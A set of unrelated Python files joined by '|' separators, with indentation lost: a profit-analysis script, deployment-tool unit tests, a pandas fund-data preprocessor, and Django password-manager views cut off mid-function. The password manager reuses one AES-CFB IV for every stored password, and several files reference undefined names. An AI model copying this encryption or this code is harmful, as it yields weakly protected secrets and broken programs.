average_monthly_change = sum(monthly_profit_change) / len(monthly_profit_change)
#Set an output file
output=(f"\nAnalysis\n"
f"----------------------------------------\n"
f"Total Months:{total_months}\n"
f"Total:${net_total}\n"
f"Average Monthly Change:${average_monthly_change:.2f}\n"
f"Greatest Increase Month:{greatest_increase[0]}(${greatest_increase[1]})\n"
f"Greatest Decrease Month:{greatest_decrease[0]}(${greatest_decrease[1]})\n")
with open("file_to_create.txt","w") as txt_file:
txt_file.write(output)
print(total_months)
print(net_total)
print(average_monthly_change)
print(greatest_increase)
print(greatest_decrease)
|
# Copyright (C) 2016 Nokia Corporation and/or its subsidiary(-ies).
import unittest
import tempfile
import os
import shutil
import datetime
import json
from deployment import samodels as m, execution, executils, database
from freezegun import freeze_time
try:
from unittest import mock
except ImportError as e:
import mock
class DummyStore():
def register_log_entry(self, deploy_id, log_entry):
pass
class MyException(Exception):
pass
class TestDeployment(unittest.TestCase):
def setUp(self):
config = execution.GeneralConfig(base_repos_path='/tmp/tests/',
haproxy_user="hauser",
haproxy_password="hapwd",
mail_sender='deploy@withings.com',
notify_mails=[])
self.deployment = execution.Deployment(1, config, mock.MagicMock(), mock.MagicMock())
self.deployment.view = m.DeploymentView()
self.session = mock.MagicMock()
def _dummy_step(self, raise_exception=True, log_error=False):
yield "Step description"
if raise_exception:
raise MyException("I was asked to raise an exception")
yield m.LogEntry('some log', execution.Severity.INFO)
if log_error:
yield m.LogEntry('some error', execution.Severity.ERROR)
yield "Step result"
def test_run_step(self):
step_output = execution.run_step(self.deployment, self._dummy_step, False, _session=self.session)
self.assertEqual(step_output, "Step result")
# First log entry is the step description
self.assertEqual(2, len(self.deployment.view.log_entries))
log_entry = self.deployment.view.log_entries[1]
self.assertEqual("some log", log_entry.message)
self.assertEqual(execution.Severity.INFO.format(), log_entry.severity)
def test_run_step_failing(self):
with self.assertRaises(execution.DeploymentError):
execution.run_step(self.deployment, self._dummy_step, _session=self.session)
def test_run_step_logging_error(self):
with self.assertRaises(execution.DeploymentError):
execution.run_step(self.deployment, self._dummy_step, False, True, _session=self.session)
def test_run_step_no_abort_on_error(self):
execution.run_step(self.deployment, self._dummy_step, raise_exception=False, log_error=True, _abort_on_error=False, _session=self.session)
class TestUtils(unittest.TestCase):
def test_capture_only_stdout(self):
entries = execution.capture("lambda", lambda x: 'stdout', 42)
self.assertEqual(1, len(entries))
entry = entries[0]
self.assertEqual('lambda: stdout', entry.message)
self.assertEqual(execution.Severity.INFO.format(), entry.severity)
def test_capture_success(self):
entries = execution.capture('success', lambda: (0, "stdout", "stderr"))
self.assertEqual(2, len(entries))
self.assertEqual('success: stdout', entries[0].message)
self.assertEqual('success: stderr', entries[1].message)
self.assertEqual(execution.Severity.INFO.format(), entries[0].severity)
self.assertEqual(execution.Severity.WARN.format(), entries[1].severity)
def test_capture_error(self):
entries = execution.capture('error', lambda: (1, "stdout", "stderr"))
self.assertEqual(3, len(entries))
self.assertEqual('error: stdout', entries[0].message)
self.assertEqual('error: stderr', entries[1].message)
self.assertEqual('error: exited with code 1', entries[2].message)
self.assertEqual(execution.Severity.INFO.format(), entries[0].severity)
self.assertEqual(execution.Severity.ERROR.format(), entries[1].severity)
self.assertEqual(execution.Severity.ERROR.format(), entries[2].severity)
@mock.patch('deployment.haproxyapi.haproxy')
def test_haproxy_action_unnormalized_keys(self, mock):
with self.assertRaises(execution.InvalidHAProxyKeyFormat):
execution.haproxy_action("fr-hq-vip-01", ["BADKEY"], "secret", "UP", execution.HAProxyAction.DISABLE)
@mock.patch('deployment.execution.haproxy', autospec=True)
def test_haproxy_action_disable(self, mock):
mock(None, None).status.side_effect = lambda backend, server: {'status': 'UP'}
mock(None, None).disable.side_effect = lambda backend, server: "OK"
execution.haproxy_action("fr-hq-vip-01", ["BACKEND,SERVER-01", "BACKEND,SERVER-02"], "secret", "UP", execution.HAProxyAction.DISABLE)
@mock.patch('deployment.execution.haproxy', autospec=True)
def test_haproxy_action_enable(self, mock):
mock(None, None).status.side_effect = lambda backend, server: {'status': 'MAINT'}
mock(None, None).enable.side_effect = lambda backend, server: "OK"
execution.haproxy_action("fr-hq-vip-01", ["BACKEND,SERVER-01", "BACKEND,SERVER-02"], "secret", "MAINT", execution.HAProxyAction.ENABLE)
@mock.patch('deployment.execution.haproxy', autospec=True)
def test_haproxy_action_unexpected_status(self, mock):
mock(None, None).status.side_effect = lambda backend, server: {'status': 'MAINT'}
with self.assertRaises(execution.UnexpectedHAproxyServerStatus):
execution.haproxy_action("fr-hq-vip-01", ["BACKEND,SERVER-01", "BACKEND,SERVER-02"], "secret", "UP", execution.HAProxyAction.ENABLE)
@mock.patch('deployment.execution.haproxy', autospec=True)
def test_haproxy_action_failed(self, mock):
mock(None, None).status.side_effect = lambda backend, server: {'status': 'MAINT'}
mock(None, None).enable.side_effect = lambda backend, server: "Error: 42"
with self.assertRaises(execution.UnexpectedHAproxyServerStatus):
execution.haproxy_action("fr-hq-vip-01", ["BACKEND,SERVER-01", "BACKEND,SERVER-02"], "secret", "MAINT", execution.HAProxyAction.ENABLE)
class TestSteps(unittest.TestCase):
def setUp(self):
database.init_db("sqlite:////tmp/test.db")
database.drop_all()
database.create_all()
self.session = database.Session()
self._load_fixtures(self.session)
self.admin_user = self.session.query(m.User).get(1)
self.deploy_user = self.session.query(m.User).get(2)
def _load_fixtures(self, session):
users = [
m.User(id=1, email="admin@withings.com", username="admin", accountid="a"),
m.User(id=2, email="jdoe@withings.com", username="jdoe", accountid="b")
]
clusters = [
m.Cluster(id=1, haproxy_host='fr-hq-vip-01', name='vip-01'),
m.Cluster(id=2, haproxy_host='fr-hq-vip-02', name='vip-02'),
]
entities = [
m.Environment(id=1, repository_id=2, name="dev", clusters=[clusters[1]], target_path="/path"),
m.Environment(id=2, repository_id=1, name="dev", clusters=[clusters[0]], target_path="/path"),
m.Role(id=1, name="admin", permissions=json.dumps({'admin': True}), users=[users[0]]),
m.Role(id=2, name="deployer", permissions=json.dumps({'deploy_business_hours': [1]}), users=[users[1]]),
m.Server(id=1, name='fr-hq-important-01', activated=True, port=22),
m.Server(id=2, name='fr-hq-important-02', activated=True, port=22),
m.Server(id=3, name='fr-hq-important-03', activated=True, port=22),
m.Server(id=4, name='fr-hq-deactivated-01', activated=False, port=22),
m.ClusterServerAssociation(server_id=1, cluster_id=1, haproxy_key="IMPORTANT-01"),
m.ClusterServerAssociation(server_id=2, cluster_id=1, haproxy_key="IMPORTANT-02"),
m.ClusterServerAssociation(server_id=4, cluster_id=2, haproxy_key=None),
m.Repository(id=1, name="my repo", git_server="git", deploy_method="inplace"),
m.Repository(id=2, name="another repo", git_server="git", deploy_method="inplace"),
m.DeploymentView(id=1, repository_name="my repo", environment_name="dev", environment_id=2, cluster_id=None, server_id=None, branch="master", commit="abcde", user_id=1, status="QUEUED", queued_date=datetime.datetime.now()),
m.DeploymentView(id=2, repository_name="another repo", environment_name="dev", environment_id=1, cluster_id=None, server_id=4, branch="master", commit="abcde", user_id=1, status="QUEUED", queued_date=datetime.datetime.now())
]
for entity in clusters + users + entities:
self.session.add(entity)
self.session.commit()
def tearDown(self):
self.session.rollback()
database.drop_all()
database.stop_engine()
# Returns the last value of a generator and the log entries it yielded. Asserts that the first value is a string, and all other (except maybe the last one) are of type LogEntry.
def _unwind(self, generator, assert_no_error=False):
step_description = generator.next()
self.assertTrue(isinstance(step_description, str) or isinstance(step_description, unicode))
entries = []
out = None
entry = None
try:
while True:
entry = generator.next()
if not(isinstance(entry, m.LogEntry)):
with self.assertRaises(StopIteration):
out = generator.next()
else:
entries.append(entry)
if assert_no_error:
self.assertNotEquals(entry.severity, m.Severity.ERROR.format())
except StopIteration:
out = entry
return out, entries
def test_load_configuration(self):
view = self.session.query(m.DeploymentView).get(1)
self._unwind(execution.check_configuration(view), assert_no_error=True)
def test_load_configuration_deactivated_servers(self):
view = self.session.query(m.DeploymentView).get(2)
_, entries = self._unwind(execution.check_configuration(view))
self.assertTrue(any(entry.severity == m.Severity.ERROR.format() for entry in entries))
# This is a Friday
@freeze_time('2015-11-28 15:00')
def test_check_deploy_allowed_friday_afternoon(self):
authorized, _ = self._unwind(execution.check_deploy_allowed(self.deploy_user, 1, 'prod'))
self.assertFalse(authorized)
# This is a Sunday
@freeze_time('2015-11-28')
def test_check_deploy_allowed_super_user(self):
authorized, _ = self._unwind(execution.check_deploy_allowed(self.admin_user, 1, 'prod'))
self.assertTrue(authorized)
# This is a Sunday
@freeze_time('2015-11-28')
def test_check_deploy_allowed_weekend(self):
authorized, _ = self._unwind(execution.check_deploy_allowed(self.deploy_user, 1, 'prod'))
self.assertFalse(authorized)
# This is a Wednesday
@freeze_time('2015-11-25 23:00')
def test_check_deploy_allowed_late(self):
authorized, _ = self._unwind(execution.check_deploy_allowed(self.deploy_user, 1, 'prod'))
self.assertFalse(authorized)
# This is Christmas! Yay!
@freeze_time('2017-12-25 10:00')
def test_check_deploy_allowed_bank_holiday(self):
authorized, _ = self._unwind(execution.check_deploy_allowed(self.deploy_user, 1, 'prod'))
self.assertFalse(authorized)
@mock.patch('git.Repo.clone_from')
def test_clone_repo(self, mock_func):
self._unwind(execution.clone_repo('/tmp/deploy/my_repo_branch', 'my_repo', 'git'))
mock_func.assert_called_with('git@git:my_repo', '/tmp/deploy/my_repo_branch')
def test_run_predeploy(self):
try:
repo_path = tempfile.mkdtemp()
with open(os.path.join(repo_path, 'predeploy.sh'), 'w') as f:
f.write('echo -n "it works for env $1 commit $2"')
f.flush()
_, entries = self._unwind(execution.run_and_delete_predeploy(repo_path, "dev", "abcde"))
self.assertEqual(2, len(entries))
entry = entries[0]
self.assertEqual("predeploy.sh: it works for env dev commit abcde", entry.message)
finally:
shutil.rmtree(repo_path)
@mock.patch('deployment.execution.haproxy_action')
def test_enable_clusters(self, mock_func):
servers_1 = [(m.Server(id=1, name='fr-hq-server-01'), "BACKEND,01"), (m.Server(id=2, name='fr-hq-server-02'), "BACKEND,02")]
servers_2 = [(m.Server(id=3, name='fr-hq-server-03'), "BACKEND,03"), (m.Server(id=4, name='fr-hq-server-04'), "BACKEND,04")]
cluster_1 = m.Cluster(id=1, name="1", haproxy_host="fr-hq-vip-01")
cluster_2 = m.Cluster(id=2, name="2", haproxy_host="fr-hq-vip-02")
asso_1 = [m.ClusterServerAssociation(server_def=server, cluster_def=cluster_1, haproxy_key=haproxy_key)
for server, haproxy_key in servers_1]
asso_2 = [m.ClusterServerAssociation(server_def=server, cluster_def=cluster_2, haproxy_key=haproxy_key)
for server, haproxy_key in servers_2]
clusters = [cluster_1, cluster_2]
self._unwind(execution.enable_clusters(clusters, "secret"))
mock_func.assert_has_calls([
mock.call("fr-hq-vip-01", ["BACKEND,01", "BACKEND,02"], "secret", '', execution.HAProxyAction.ENABLE),
mock.call("fr-hq-vip-02", ["BACKEND,03", "BACKEND,04"], "secret", '', execution.HAProxyAction.ENABLE)
])
@mock.patch('deployment.execution.haproxy_action')
def test_disable_clusters(self, mock_func):
servers_1 = [(m.Server(id=1, name='fr-hq-server-01'), "BACKEND,01"), (m.Server(id=2, name='fr-hq-server-02'), "BACKEND,02")]
servers_2 = [(m.Server(id=3, name='fr-hq-server-03'), "BACKEND,03"), (m.Server(id=4, name='fr-hq-server-04'), "BACKEND,04")]
cluster_1 = m.Cluster(id=1, name="1", haproxy_host="fr-hq-vip-01")
cluster_2 = m.Cluster(id=2, name="2", haproxy_host="fr-hq-vip-02")
asso_1 = [m.ClusterServerAssociation(server_def=server, cluster_def=cluster_1, haproxy_key=haproxy_key)
for server, haproxy_key in servers_1]
asso_2 = [m.ClusterServerAssociation(server_def=server, cluster_def=cluster_2, haproxy_key=haproxy_key)
for server, haproxy_key in servers_2]
clusters = [cluster_1, cluster_2]
self._unwind(execution.disable_clusters(clusters, "secret"))
mock_func.assert_has_calls([
mock.call("fr-hq-vip-01", ["BACKEND,01", "BACKEND,02"], "secret", '', execution.HAProxyAction.DISABLE),
mock.call("fr-hq-vip-02", ["BACKEND,03", "BACKEND,04"], "secret", '', execution.HAProxyAction.DISABLE)
])
@mock.patch('deployment.execution.haproxy_action')
def test_ensure_clusters_up(self, mock_func):
servers_1 = [(m.Server(id=1, name='fr-hq-server-01'), "BACKEND,01"), (m.Server(id=2, name='fr-hq-server-02'), "BACKEND,02")]
servers_2 = [(m.Server(id=3, name='fr-hq-server-03'), "BACKEND,03"), (m.Server(id=4, name='fr-hq-server-04'), "BACKEND,04")]
cluster_1 = m.Cluster(id=1, name="1", haproxy_host="fr-hq-vip-01")
cluster_2 = m.Cluster(id=2, name="2", haproxy_host="fr-hq-vip-02")
asso_1 = [m.ClusterServerAssociation(server_def=server, cluster_def=cluster_1, haproxy_key=haproxy_key)
for server, haproxy_key in servers_1]
asso_2 = [m.ClusterServerAssociation(server_def=server, cluster_def=cluster_2, haproxy_key=haproxy_key)
for server, haproxy_key in servers_2]
clusters = [cluster_1, cluster_2]
self._unwind(execution.ensure_clusters_up(clusters, "secret"))
mock_func.assert_has_calls([
mock.call("fr-hq-vip-01", ["BACKEND,01", "BACKEND,02"], "secret", 'UP', execution.HAProxyAction.ENABLE),
mock.call("fr-hq-vip-02", ["BACKEND,03", "BACKEND,04"], "secret", 'UP', execution.HAProxyAction.ENABLE)
])
@freeze_time('2015-11-25 23:00')
@mock.patch('deployment.executils.exec_cmd', autospec=True)
@mock.patch('deployment.execution.exec_cmd', autospec=True)
def test_sync(self, mock_func, mock_func_2):
mock_func.side_effect = lambda *args, **kwargs: (0, "stdout", "stderr")
mock_func_2.side_effect = lambda *args, **kwargs: (0, "stdout", "stderr")
host = executils.Host("fr-hq-deployment-01", "scaleweb", 22)
self._unwind(execution.parallel_sync("/home/scaleweb/project", "-cr --delete-after", "master", "abcde", "/home/deploy/project/", [host], 1))
mock_func.assert_has_calls([
mock.call(["rsync", "-e", "ssh -p 22", "--exclude=.git", "-cr", "--delete-after", "--exclude=.git_release", "/home/deploy/project/", "scaleweb@fr-hq-deployment-01:/home/scaleweb/project/"]),
])
mock_func_2.assert_has_calls([
mock.call(['ssh', 'scaleweb@fr-hq-deployment-01', '-p', '22', 'mkdir', '-p', "/home/scaleweb/project/"], timeout=600),
mock.call(['ssh', 'scaleweb@fr-hq-deployment-01', '-p', '22', 'echo', "'master\nabcde\n2015-11-25T23:00:00.000000\n/home/scaleweb/project/'", '>', '/home/scaleweb/project/.git_release'], timeout=600)
], any_order=True) # TODO: investiguate the extra calls without parameters
@mock.patch('deployment.executils.exec_cmd', autospec=True)
def test_release_inplace(self, mock_func):
host = executils.Host("some-server", "scaleweb", 22)
self._unwind(execution.release(host, "inplace", "/home/scaleweb", "/home/scaleweb/", "project"))
self.assertItemsEqual(mock_func.call_args_list, [])
@mock.patch('deployment.executils.exec_cmd', autospec=True)
def test_release_symlink(self, mock_func):
mock_func.side_effect = lambda *args, **kwargs: (0, "stdout", "stderr")
host = executils.Host("fr-hq-deployment-01", "scaleweb", 22)
self._unwind(execution.release(host, "symlink", "/home/scaleweb/", "production", "/home/scaleweb/production_releases/20151204_prod_abcde/"))
mock_func.assert_called_with(['ssh', 'scaleweb@fr-hq-deployment-01', '-p', '22', 'cd', '/home/scaleweb/', '&&', 'ln', '-s', "/home/scaleweb/production_releases/20151204_prod_abcde/", 'tmp-link', '&&', 'mv', '-T', 'tmp-link', "/home/scaleweb/production"], timeout=600)
@mock.patch('deployment.execution.exec_script_remote', autospec=True)
@mock.patch('deployment.execution.run_cmd_by_ssh', autospec=True)
def test_run_deploy(self, mock_script_func, mock_ssh_func):
mock_script_func.side_effect = lambda *args, **kwargs: (0, "stdout", "stderr")
mock_ssh_func.side_effect = lambda *args, **kwargs: (0, "stdout", "stderr")
# Just run the method to catch obvious mistakes
# It's too complex to write a robust non-trivial test against this (very simple) method.
host = executils.Host("some-server", "scaleweb", 22)
self._unwind(execution.run_and_delete_deploy(host, '/home/scaleweb/project', 'dev', 'abcde'), assert_no_error=True)
@mock.patch('deployment.executils.exec_cmd', autospec=True)
def test_run_tests(self, mock_func):
mock_func.side_effect = lambda *args, **kwargs: (0, "ok", "still ok")
env = self.session.query(m.Environment).get(2)
host = executils.Host.from_server(env.servers[0], "scaleweb")
# Remote
report = execution.run_test(env, "master", "abcde", host=host,
mail_sender="deploy@withings.com", local=False)
self.assertEquals(False, report.failed)
# Local
report = execution.run_test(env, "master", "abcde", host=host,
mail_sender="deploy@withings.com", local=True,
local_repo_path="/home/deploy/project")
self.assertIsNone(report)
def test_check_servers_availability(self):
servers = [self.session.query(m.Server).get(1)]
ok, entries = self._unwind(execution.check_servers_availability(self.session, 2, servers, "prod", "prod", "abcde"))
self.assertFalse(ok)
servers = [self.session.query(m.Server).get(4)]
ok, entries = self._unwind(execution.check_servers_availability(self.session, 2, servers, "prod", "prod", "abcde"))
self.assertTrue(ok)
class TestSeverity(unittest.TestCase):
def test_severity_format(self):
self.assertEqual("info", execution.Severity.INFO.format())
self.assertEqual("warn", execution.Severity.WARN.format())
self.assertEqual("error", execution.Severity.ERROR.format())
def test_severity_from_string(self):
self.assertEqual(execution.Severity.INFO, execution.Severity.from_string("info"))
self.assertEqual(execution.Severity.WARN, execution.Severity.from_string("warn"))
self.assertEqual(execution.Severity.ERROR, execution.Severity.from_string("error"))
|
import os
from datetime import datetime
import pandas as pd
from constants import FUND_LIST, FOLDER, FILES, FILES_PATH, FUND_NAME_COL, \
FUND_DIV, FUND_MONTH, FUND_FEATURES, FMFUNDCLASSINFOC_ID, DATE, PROFIT, PERFORMANCEID, \
BEGIN_DATE_FOR_TEST, FIRST_DATE, TRAIN_DATA, VALIDATE_DATA, FUND_FEATURES, END_DATE, \
FEATURE_TRAIN_DATA, FEATURE_VALIDATE_DATA, FUND_NUMBER, RAW_TRAIN_DATA, \
RAW_VALIDATE_DATA, RAW_DATA, NEWS_DATA
class FundDataHandler():
def __init__(self):
#self.df_fund_div = pd.read_csv(FUND_DIV)
self.df_raw = pd.read_csv(RAW_DATA)
self.df_fund = pd.read_csv(FUND_MONTH)
self.df_features = pd.read_csv(FUND_FEATURES)
self.df_news = pd.read_csv(NEWS_DATA)
self.df_features = self.df_features.drop(columns=['index'])
self.fund_list = FUND_LIST
def get_news_data(self, df):
dates = list(set(df['Date']))
vals = []
for date in dates:
val = df[df['Date'] == date]['label'].mean()
vals.append(val)
max_val = abs(max(vals, key=abs)) + 1
vals = [val / max_val for val in vals]
d = {'NEWS': vals}
df_res = pd.DataFrame(data=d)
df_res.index = dates
df_res.index.name = 'Date'
df_res = df_res.sort_index(ascending=True)
#df_res = df_res.drop(columns=['Date'],axis=1)
df_res = df_res.ffill().fillna(df_res.mean())
return df_res
def get_raw_data(self):
frames = []
for f in self.fund_list:
df_tmp = self.df_raw[self.df_raw['ISIN_CDE'] == f ]
df_tmp_price = df_tmp['SELL_PRICE']
df_tmp_price.index = df_tmp['PRICE_DATE']
df_tmp_price.index.name = 'Date'
frames.append(df_tmp_price)
df_res = pd.concat(frames, axis=1).sort_index(ascending=True)
df_res.columns = self.fund_list
df_res.index.name = 'Date'
return df_res
def handle_date(self, df, index):
# Change Date to 'xxxx-xx-01'
dates = df[index]
new_dates = []
for date in dates:
#print(date.split('-')[-1])
y, m, d = date.split('-')
n_y, n_m, n_d = y, m, d
if int(d) <= 15:
n_d = str(1).zfill(2)
else:
n_d = str(1).zfill(2)
if m == '12':
n_y = str(int(y)+1)
n_m = str(1).zfill(2)
else:
n_m = str((int(m) + 1)).zfill(2)
new_date = '-'.join([n_y,n_m.zfill(2),n_d.zfill(2)])
new_dates.append(new_date)
df['Date'] = new_dates
return df
def change_to_pct(self, df):
df.index = df['Date']
res = df.drop(columns=['Date'],axis=1)
return res.pct_change()
def filter_cols(self, df, cols):
return df[cols]
def read_fund(self):
df_fund = None
pre_df_fund = pd.read_csv(FILES_PATH[0], names=FOUND_NAME_COL)
for f in FILES_PATH[1:]:
cur_df_fund = pd.read_csv(f, names=FOUND_NAME_COL)
df_fund = pre_df_fund.append(cur_df_fund)
pre_df_fund = df_fund
if df_fund:
return df_fund
return pre_df_fund
def _base_check_fund_id(self, df, key, val):
res = df.loc[df[key] == val]
if res.empty:
raise Exception('{0} == {1} not exist'.format(key, val))
return res
def select_fund_by_pfid(self, _id):
return self._base_check_fund_id(self.df_fund, PERFORMANCEID, _id)
def check_fund_div_by_id(self, _id):
res = self._base_check_fund_id(self.df_fund_div, FMFUNDCLASSINFOC_ID, _id)
return res.iloc[0][PERFORMANCEID]
def select_fund_by_id(self, _id):
return self._base_check_fund_id(self.df_fund, FMFUNDCLASSINFOC_ID, _id)
def get_fund_profit_by_id(self, _id):
res = self.select_fund_by_id(_id)
res.index = res[DATE]
return res[PROFIT]
def get_fund_profit_by_pfid(self, _id):
res = self.select_fund_by_pfid(_id)
res.index = res['DATAYM']
return res['RET1M']
def combine_fund_profit_by_id(self):
frames = []
performance_ids = []
for _id in FMFUNDCLASSINFOC_IDS:
performance_ids.append(self.check_fund_div_by_id(_id))
df_profit = self.get_fund_profit_by_id(_id)
frames.append(df_profit)
df_res = pd.concat(frames, axis=1).sort_index(ascending=True)
df_res.columns = performance_ids
return df_res
def filter_date(self, df, first_date, end_date):
return df[first_date:end_date]
#try:
# first_row_number = df.index.get_loc(first_date)
# end_row_number = df.index.get_loc(end_date)
#except:
# raise Exception('[ERROR] Cannot find {} or {} in index'.format(first_date, end_date))
#return df[first_row_number:end_row_number+1]
def get_date_between(self, df, first_date, end_date):
return df[first_row_number:end_row_number]
def check_first_date_valid(self, df, date):
res_valid = []
res_invalid = []
columns = df.columns
for i in columns:
df_profit = df[i]
first_valid_date = df_profit.first_valid_index()
if datetime.strptime(first_valid_date, '%Y-%m-%d') > datetime.strptime(FIRST_DATE, '%Y-%m-%d'):
print('[WARNING] {} first valid date {} is earlier first date {}'.format(i, first_valid_date, FIRST_DATE))
#pass
res_invalid.append(i)
else:
print('[INFO] {} is valid date'.format(i))
res_valid.append(i)
return res_valid, res_invalid
def combine_fund_profit_by_pfid(self):
frames = []
performance_ids = []
ids = []
for _id in self.fund_list:
try:
df_profit = self.get_fund_profit_by_pfid(_id)
except:
print('[WARNING] {0} not found'.format(_id))
continue
ids.append(_id)
frames.append(df_profit)
df_res = pd.concat(frames, axis=1).sort_index(ascending=True)
df_res.columns = ids
df_res.index.name = 'Date'
return df_res
def combine_df(self, df_list):
frames = df_list
df_res = pd.concat(frames, axis=1).sort_index(ascending=True)
df_res.index.name = 'Date'
df_res = df_res.ffill().fillna(df_res.mean())
return df_res
def fund_profit_to_csv(self, df, path, col):
df = df.reset_index(level=[col])
df.to_csv(path, index=False)
def seperate_train_test(self, df, date):
# data format str 2021-04-28
#try:
# row_number = df.index.get_loc(date)
#except:
# raise Exception('[ERROR] Cannot find {} in index'.format(date))
df_train = df[:date]
df_validation = df[date:]
return df_train, df_validation
def handle_news(self):
df_news = self.handle_date(self.df_news, 'date')
df_news = self.get_news_data(df_news)
f_valid, f_invalid = self.check_first_date_valid(df_news, FIRST_DATE)
df_news = self.filter_cols(df_news, f_valid)
df_news = self.filter_date(df_news, FIRST_DATE, END_DATE)
return df_news
def handle_features(self):
df_features = self.handle_date(self.df_features, 'Date')
df_features = self.change_to_pct(self.df_features)
f_valid, f_invalid = self.check_first_date_valid(df_features, FIRST_DATE)
df_features = self.filter_cols(df_features, f_valid)
df_features = self.filter_date(df_features, FIRST_DATE, END_DATE)
return df_features
def handle_funds(self):
df_fund = self.combine_fund_profit_by_pfid()
valid, invalid = self.check_first_date_valid(df_fund, FIRST_DATE)
df_fund = self.filter_cols(df_fund, valid[:FUND_NUMBER])
df_fund = self.filter_date(df_fund, FIRST_DATE, END_DATE)
return df_fund
def handle_raw(self):
df_raw = self.get_raw_data()
valid, invalid = self.check_first_date_valid(df_raw, FIRST_DATE)
df_raw = self.filter_cols(df_raw, valid[:FUND_NUMBER])
df_raw = self.filter_date(df_raw, FIRST_DATE, END_DATE)
return df_raw
def run(self):
df_features = self.handle_features()
df_funds = self.handle_funds()
df_raw = self.handle_raw()
df_news = self.handle_news()
# Check index size the same
if len(df_features.index) != len(df_funds.index):
raise Exception('[ERROR] Index not the same')
# Combine fund and feature
df_features = self.combine_df([df_funds, df_features, df_news])
print(df_features.head())
# Seperate and save raw
df_raw_train, df_raw_validation = self.seperate_train_test(df_raw, BEGIN_DATE_FOR_TEST)
self.fund_profit_to_csv(df_raw_train, RAW_TRAIN_DATA, 'Date')
self.fund_profit_to_csv(df_raw_validation, RAW_VALIDATE_DATA, 'Date')
# Seperate and save features
df_feature_train, df_feature_validation = self.seperate_train_test(df_features, BEGIN_DATE_FOR_TEST)
self.fund_profit_to_csv(df_feature_train, FEATURE_TRAIN_DATA, 'Date')
self.fund_profit_to_csv(df_feature_validation, FEATURE_VALIDATE_DATA, 'Date')
# Seperate and save funds
df_train, df_validation = self.seperate_train_test(df_funds, BEGIN_DATE_FOR_TEST)
self.fund_profit_to_csv(df_train, TRAIN_DATA, 'Date')
self.fund_profit_to_csv(df_validation, VALIDATE_DATA, 'Date')
def test(self):
df_news = self.handle_news()
print(df_news['NEWS'].isnull().values.any())
if __name__ == '__main__':
fdh = FundDataHandler()
fdh.run()
#fdh.test()
|
from django.http import HttpResponse, HttpResponseRedirect
from django.db.models import Q
from django.template import loader
from django.shortcuts import render, redirect
from django.utils.crypto import get_random_string, pbkdf2, salted_hmac
from django.contrib.auth.hashers import check_password
from django.contrib.auth.models import User
from django.contrib.auth import logout
from django.contrib.postgres.search import TrigramSimilarity
from django.db.models.functions import Greatest
from django_otp.decorators import otp_required
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.contrib import messages
from .models import Passwords
from .forms import PasswordForm, GeneratePasswordForm, EditPasswordForm
from Crypto.Cipher import AES
from random import randint
import string
@login_required
def index(request):
if 'cipherKey' not in request.session:
return redirect('verify_pw')
template = loader.get_template('password/index.html')
if request.user.is_authenticated:
data = Passwords.objects.filter(user = request.user)
for obj in data:
encryption_suite = AES.new(bytes.fromhex(request.session.get('cipherKey')), AES.MODE_CFB, bytes.fromhex(request.session.get('iv')))
obj.pw = encryption_suite.decrypt(bytes.fromhex(obj.pw)).decode('utf-8')
context = {
'data': data,
}
else:
context = {}
return HttpResponse(template.render(context, request))
@login_required
def edit(request, id):
password = 'Generated password'
length = 8
if 'cipherKey' not in request.session:
return redirect('verify_pw')
if request.method == 'POST' and 'GenerateSubmit' in request.POST:
generateform = GeneratePasswordForm(request.POST or None, prefix='generate')
if generateform.is_valid():
data = generateform.cleaned_data
length = data['length']
charset = ''
personal_str = data['personal_details']
# check if personal details were included
if personal_str != '':
# from the string, get list with each word as an item
personal_lst = str(personal_str).split(",")
# length of characters of personal words inputted
personal_length = len(personal_str)
for char in personal_str:
if char == ",":
personal_length -= 1
# check if number of characters in personal details exceeds length set
if personal_length > length:
password = "Length of personal details exceed password length!"
else:
if data['use_lower']:
charset += string.ascii_lowercase
if data['use_upper']:
charset += string.ascii_uppercase
if data['use_digits']:
charset += string.digits
if data['use_special']:
charset += string.punctuation
if data['avoid_similar']:
charset = [c for c in charset if c not in similar_chars]
# randomly generate password without details, then afterwards
# randomly insert the items in personal_arr into the password generated
length -= personal_length
before_password = get_random_string(length, charset)
for item in personal_lst:
pos = randint(0, len(before_password) - 1) # pick random position to insert item
before_password = "".join((before_password[:pos], item, before_password[pos:])) # insert item at pos
password = before_password
else:
if data['use_lower']:
charset += string.ascii_lowercase
if data['use_upper']:
charset += string.ascii_uppercase
if data['use_digits']:
charset += string.digits
if data['use_special']:
charset += string.punctuation
if data['avoid_similar']:
charset = [c for c in charset if c not in similar_chars]
password = get_random_string(length, charset)
obj = Passwords.objects.get(id = id)
if request.method == 'POST' and 'EditSubmit' in request.POST:
editform = EditPasswordForm(request.POST, prefix='edit')
if editform.is_valid():
encryption_suite = AES.new(bytes.fromhex(request.session.get('cipherKey')), AES.MODE_CFB, bytes.fromhex(request.session.get('iv')))
obj.pw = encryption_suite.encrypt(editform.cleaned_data['npw'].encode('utf-8')).hex()
obj.save()
return redirect('/password/')
else:
return render(request, 'password/edit.html', {'obj': obj, 'edit_form' : editform})
encryption_suite = AES.new(bytes.fromhex(request.session.get('cipherKey')), AES.MODE_CFB, bytes.fromhex(request.session.get('iv')))
obj.pw = encryption_suite.decrypt(bytes.fromhex(obj.pw)).decode('utf-8')
editform = EditPasswordForm(prefix='edit')
generateform = GeneratePasswordForm(prefix='add')
extra_context = {
'edit_form':EditPasswordForm(prefix='edit'),
'generate_form':GeneratePasswordForm(prefix='generate'),
'password':password,
'length':length,
'obj': obj,
}
return render(request, 'password/edit.html', extra_context)
@login_required
def add_pw(request):
password = 'Generated password'
length = 8
if 'cipherKey' not in request.session:
return redirect('verify_pw')
if request.method == 'POST' and 'GenerateSubmit' in request.POST:
addform = PasswordForm(request.POST, prefix='add')
generateform = GeneratePasswordForm(request.POST or None, prefix='generate')
if generateform.is_valid():
data = generateform.cleaned_data
length = data['length']
charset = ''
personal_str = data['personal_details']
# check if personal details were included
if personal_str != '':
# from the string, get list with each word as an item
personal_lst = str(personal_str).split(",")
# length of characters of personal words inputted
personal_length = len(personal_str)
for char in personal_str:
if char == ",":
personal_length -= 1
# check if number of characters in personal details exceeds length set
if personal_length > length:
password = "Length of personal details exceed password length!"
else:
if data['use_lower']:
charset += string.ascii_lowercase
if data['use_upper']:
charset += string.ascii_uppercase
if data['use_digits']:
charset += string.digits
if data['use_special']:
charset += string.punctuation
if data['avoid_similar']:
charset = [c for c in charset if c not in similar_chars]
# randomly generate password without details, then afterwards
# randomly insert the items in personal_arr into the password generated
length -= personal_length
before_password = get_random_string(length, charset)
for item in personal_lst:
